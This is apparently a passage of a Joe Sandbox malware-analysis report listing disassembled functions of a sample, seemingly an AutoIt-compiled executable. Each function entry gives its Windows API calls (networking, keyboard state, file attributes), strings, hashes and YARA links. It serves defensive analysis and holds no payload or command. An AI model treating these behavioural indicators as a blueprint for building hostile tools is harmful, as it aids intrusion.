                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: a2cb8d413fe8b82804418f325515e8bb1096c12c4975cc5f0e0a434b618c3cac
                                                                      • Instruction ID: 17d763ca71d212e6e262ca8e47475cddcf4d0f9ba9459d19b3b3f7220df34e72
                                                                      • Opcode Fuzzy Hash: a2cb8d413fe8b82804418f325515e8bb1096c12c4975cc5f0e0a434b618c3cac
                                                                      • Instruction Fuzzy Hash: 703180B5500204BFDB10AF64DC88FBD7BA9BB51319F104116FA15D7190DBB8AE40CF69
                                                                      Function 00C52C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00C52C94
                                                                        • Part of subcall function 00C529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000), ref: 00C529DE
                                                                        • Part of subcall function 00C529C8: GetLastError.KERNEL32(00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000,00000000), ref: 00C529F0
                                                                      • _free.LIBCMT ref: 00C52CA0
                                                                      • _free.LIBCMT ref: 00C52CAB
                                                                      • _free.LIBCMT ref: 00C52CB6
                                                                      • _free.LIBCMT ref: 00C52CC1
                                                                      • _free.LIBCMT ref: 00C52CCC
                                                                      • _free.LIBCMT ref: 00C52CD7
                                                                      • _free.LIBCMT ref: 00C52CE2
                                                                      • _free.LIBCMT ref: 00C52CED
                                                                      • _free.LIBCMT ref: 00C52CFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 9f5925d2634d728156da5c27dd0d8cd3628cde83164d2659813fdc1dd0e0e53b
                                                                      • Instruction ID: 475d4439ecaff2a83591c0f78b651abd765da17238fe8a82fb61854a4e436bb1
                                                                      • Opcode Fuzzy Hash: 9f5925d2634d728156da5c27dd0d8cd3628cde83164d2659813fdc1dd0e0e53b
                                                                      • Instruction Fuzzy Hash: D311A47A100108AFCB02EF54D882CDD3BA5FF16351F5144A5FE48AF322DA31EE94AB94
                                                                      Function 00C21410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C21459
                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00C214F8
                                                                      • UnregisterHotKey.USER32(?), ref: 00C216DD
                                                                      • DestroyWindow.USER32(?), ref: 00C624B9
                                                                      • FreeLibrary.KERNEL32(?), ref: 00C6251E
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C6254B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      • Opcode ID: 5909a5cb66f70a9b5a89a7815878ccc81f279b0848f28621654081629bc2c173
                                                                      • Instruction ID: 4363b7cede5dd9cd9d9a29cd5bfeafc8b4e188ea4d3e84cbc6c498787c348003
                                                                      • Opcode Fuzzy Hash: 5909a5cb66f70a9b5a89a7815878ccc81f279b0848f28621654081629bc2c173
                                                                      • Instruction Fuzzy Hash: 1AD15A31701622CFDB29EF15D8D9A29F7A0BF15700F1842ADE84A6B661DB30ED12DF91
                                                                      Function 00C97DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C97FAD
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C97FC1
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C97FEB
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C98005
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C98017
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C98060
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C980B0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                      • String ID: *.*
                                                                      • API String ID: 769691225-438819550
                                                                      • Opcode ID: 662edc0b338ea496eae1bdd0bd83719b071d8443d0e63a35f20c326389da831c
                                                                      • Instruction ID: 3ecb994b092f22caaa36d416c6b3050faef87061c7df8efdbe6fc527eb3e8baf
                                                                      • Opcode Fuzzy Hash: 662edc0b338ea496eae1bdd0bd83719b071d8443d0e63a35f20c326389da831c
                                                                      • Instruction Fuzzy Hash: 1B81B1715182419FCF20EF55C888AAEB3E8BF89310F144D6EF895D7250EB34DE498B52
                                                                      Function 00C9359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C935E4
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • LoadStringW.USER32(00CF2390,?,00000FFF,?), ref: 00C9360A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-2391861430
                                                                      • Opcode ID: 18962b93f62b5775ba7a25703dd626ac58e1678a698d9cbd6c2e4821a733234c
                                                                      • Instruction ID: 1073e612bd997d89c26381f627256ef5283069313e4ed13fe2899b9d3cabd3ac
                                                                      • Opcode Fuzzy Hash: 18962b93f62b5775ba7a25703dd626ac58e1678a698d9cbd6c2e4821a733234c
                                                                      • Instruction Fuzzy Hash: AE517B7290025AABCF14EBE0DC86EEEBB78EF14344F084125F505724A1EB305B99EB61
                                                                      Function 00CB8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                        • Part of subcall function 00C3912D: GetCursorPos.USER32(?), ref: 00C39141
                                                                        • Part of subcall function 00C3912D: ScreenToClient.USER32(00000000,?), ref: 00C3915E
                                                                        • Part of subcall function 00C3912D: GetAsyncKeyState.USER32(00000001), ref: 00C39183
                                                                        • Part of subcall function 00C3912D: GetAsyncKeyState.USER32(00000002), ref: 00C3919D
                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00CB8B6B
                                                                      • ImageList_EndDrag.COMCTL32 ref: 00CB8B71
                                                                      • ReleaseCapture.USER32 ref: 00CB8B77
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00CB8C12
                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CB8C25
                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00CB8CFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 1924731296-2107944366
                                                                      • Opcode ID: 2729a0b6048a45655c91ad2880118869f2253439e56de544326664b138c7f2f5
                                                                      • Instruction ID: accb2aa7598fc39d9044e838417d5aba29f04e76468f561ca409ccc3eac69604
                                                                      • Opcode Fuzzy Hash: 2729a0b6048a45655c91ad2880118869f2253439e56de544326664b138c7f2f5
                                                                      • Instruction Fuzzy Hash: F4516C71104214AFD704EF14DC95FAE77E4FB88714F04062DF956972E1CB71AA48DBA2
                                                                      Function 00C9C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C9C272
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C9C29A
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C9C2CA
                                                                      • GetLastError.KERNEL32 ref: 00C9C322
                                                                      • SetEvent.KERNEL32(?), ref: 00C9C336
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C9C341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 126f9ace626a41a8e899b250aca631845a88db60397ea8ff2f4fd22ebc0df087
                                                                      • Instruction ID: 3aaefd0fcdae68b1ac0dfc4014ea53ed24d70bd59fcc983aa111d73cebb9ce6c
                                                                      • Opcode Fuzzy Hash: 126f9ace626a41a8e899b250aca631845a88db60397ea8ff2f4fd22ebc0df087
                                                                      • Instruction Fuzzy Hash: 75314BB1600608AFDB219FA58CC8BAB7AFCFB49744F14851EF456E2211DB34DE049B61
                                                                      Function 00C8989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C63AAF,?,?,Bad directive syntax error,00CBCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C898BC
                                                                      • LoadStringW.USER32(00000000,?,00C63AAF,?), ref: 00C898C3
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C89987
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 858772685-4153970271
                                                                      • Opcode ID: 32f5ea26976849dc56cd71c3d93796fd71664691a8b874df83bb2bf4303c41a1
                                                                      • Instruction ID: 6d76e7114af3bc9ea09e794ddf34a2dc454046cb4dcf7789129c07ad83b100df
                                                                      • Opcode Fuzzy Hash: 32f5ea26976849dc56cd71c3d93796fd71664691a8b874df83bb2bf4303c41a1
                                                                      • Instruction Fuzzy Hash: D6218031D5025EABCF11EF90DC46EEE7739FF28304F084469F519620A2EB719618EB11
                                                                      Function 00C8209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32 ref: 00C820AB
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00C820C0
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C8214D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 1290815626-3381328864
                                                                      • Opcode ID: 0c1808f8af3cdab1def5f7389e1b5f4c9342918b70b0b5eb11f349dbe5a6bea3
                                                                      • Instruction ID: dc067fa5594b420f903aeaccf0c3dfdddc4a83aa3f3903e1036fe3ee6ea1508e
                                                                      • Opcode Fuzzy Hash: 0c1808f8af3cdab1def5f7389e1b5f4c9342918b70b0b5eb11f349dbe5a6bea3
                                                                      • Instruction Fuzzy Hash: 8C110676688706BAF6157221DC0EEAF379CEB0432CF301126FB05A50D1FEA16D016718
                                                                      Function 00C58D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7334fd3f7713cc131145a63c6fead313a6354a2ebceb73be651155604d4959ba
                                                                      • Instruction ID: b9ec7c85bbae5aba758a9002e1b8993248a181f93a31e7a7833589753f77459c
                                                                      • Opcode Fuzzy Hash: 7334fd3f7713cc131145a63c6fead313a6354a2ebceb73be651155604d4959ba
                                                                      • Instruction Fuzzy Hash: 4DC1E278904249EFCF21DFA8C841BADBBB0FF4D311F144199E825A7292C7748A89CB65
                                                                      Function 00C5CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                      • String ID:
                                                                      • API String ID: 1282221369-0
                                                                      • Opcode ID: 25514bd597fdc84317225b3df39ff6ce46edfdd5a0dbe34fe06d2e128bdc7c22
                                                                      • Instruction ID: 666fd567b1bf1079b4264ef13d4931217a7b4cfb50573cba79b68fc1b289d38d
                                                                      • Opcode Fuzzy Hash: 25514bd597fdc84317225b3df39ff6ce46edfdd5a0dbe34fe06d2e128bdc7c22
                                                                      • Instruction Fuzzy Hash: EB614579904300AFDB21AFF4D8C1B6E7BE5AF01722F14026DFC11A7282D6319AC9D799
                                                                      Function 00CB50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00CB5186
                                                                      • ShowWindow.USER32(?,00000000), ref: 00CB51C7
                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00CB51CD
                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00CB51D1
                                                                        • Part of subcall function 00CB6FBA: DeleteObject.GDI32(00000000), ref: 00CB6FE6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB520D
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CB521A
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CB524D
                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00CB5287
                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00CB5296
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0
                                                                      • Opcode ID: 7e51287f106a520c57f53a6449854ae331c2918cb7da501b65925c2d9e431662
                                                                      • Instruction ID: 3dfb4f195d79f793b2ebee0268d8f8bf5834106c8340b4b8f765b85cedf736ee
                                                                      • Opcode Fuzzy Hash: 7e51287f106a520c57f53a6449854ae331c2918cb7da501b65925c2d9e431662
                                                                      • Instruction Fuzzy Hash: 1651A330A52A08FFEF249F69DC4ABDD3B65FB05321F144112F525962E0C7B5AE80DB41
                                                                      Function 00C38B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C76890
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C768A9
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C768B9
                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C768D1
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C768F2
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C38874,00000000,00000000,00000000,000000FF,00000000), ref: 00C76901
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C7691E
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C38874,00000000,00000000,00000000,000000FF,00000000), ref: 00C7692D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID:
                                                                      • API String ID: 1268354404-0
                                                                      • Opcode ID: a50def95b58a68e41ffe438ac3a5736c23e6b89579a29ba555e8b72d164634f2
                                                                      • Instruction ID: e26b536befb2e89e2ba51560b69fb3a8dc937c86fafaf9f25e3b63fbd1760317
                                                                      • Opcode Fuzzy Hash: a50def95b58a68e41ffe438ac3a5736c23e6b89579a29ba555e8b72d164634f2
                                                                      • Instruction Fuzzy Hash: 67518B7061070AEFDB20CF25CC95FAABBB5EB48364F144518F956972E0DB70EA50DB50
                                                                      Function 00C9C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C9C182
                                                                      • GetLastError.KERNEL32 ref: 00C9C195
                                                                      • SetEvent.KERNEL32(?), ref: 00C9C1A9
                                                                        • Part of subcall function 00C9C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C9C272
                                                                        • Part of subcall function 00C9C253: GetLastError.KERNEL32 ref: 00C9C322
                                                                        • Part of subcall function 00C9C253: SetEvent.KERNEL32(?), ref: 00C9C336
                                                                        • Part of subcall function 00C9C253: InternetCloseHandle.WININET(00000000), ref: 00C9C341
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 337547030-0
                                                                      • Opcode ID: ff403cb43d23a92f3d6ac5773857f680b423e023c01e6a47b4699844e464bdbd
                                                                      • Instruction ID: f3bf25ccea99aca2c773b88b372b4e4420a845acc1474b4daa45a846775d18a5
                                                                      • Opcode Fuzzy Hash: ff403cb43d23a92f3d6ac5773857f680b423e023c01e6a47b4699844e464bdbd
                                                                      • Instruction Fuzzy Hash: F0318C71200A41AFDF259FA5DC88B6ABBF8FF58300B10451DF96682620DB30E914ABA0
                                                                      Function 00C825A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C83A57
